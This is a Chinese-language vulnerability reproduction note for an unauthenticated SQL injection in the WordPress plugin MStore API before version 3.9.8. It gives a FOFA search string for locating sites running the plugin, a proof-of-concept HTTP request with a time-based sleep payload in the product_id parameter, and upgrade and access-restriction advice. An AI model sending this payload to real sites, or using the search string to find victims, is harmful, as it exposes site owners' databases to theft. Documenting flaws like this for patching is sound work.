0x01 產品簡介
WordPress和WordPress plugin都是WordPress基金會的產品。WordPress是一套使用PHP語言開發的博客平臺。該平臺支持在PHP和MySQL的服務器上架設個人博客網站。WordPress plugin是一個應用插件。
0x02 漏洞概述
WordPress plugin MStore API 3.9.8 版本之前存在SQL注入漏洞,該漏洞源于沒有正確清理或轉義某些字段,導致出現SQL注入,未經身份驗證的遠程攻擊者可獲取數據庫敏感信息。
0x03 復現環境
FOFA:body="/wp-content/plugins/mstore-api/"
0x04 漏洞復現
PoC
POST /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
延時6秒
0x05 修復建議
關閉互聯網暴露面或接口設置訪問權限
將插件升級至安全版本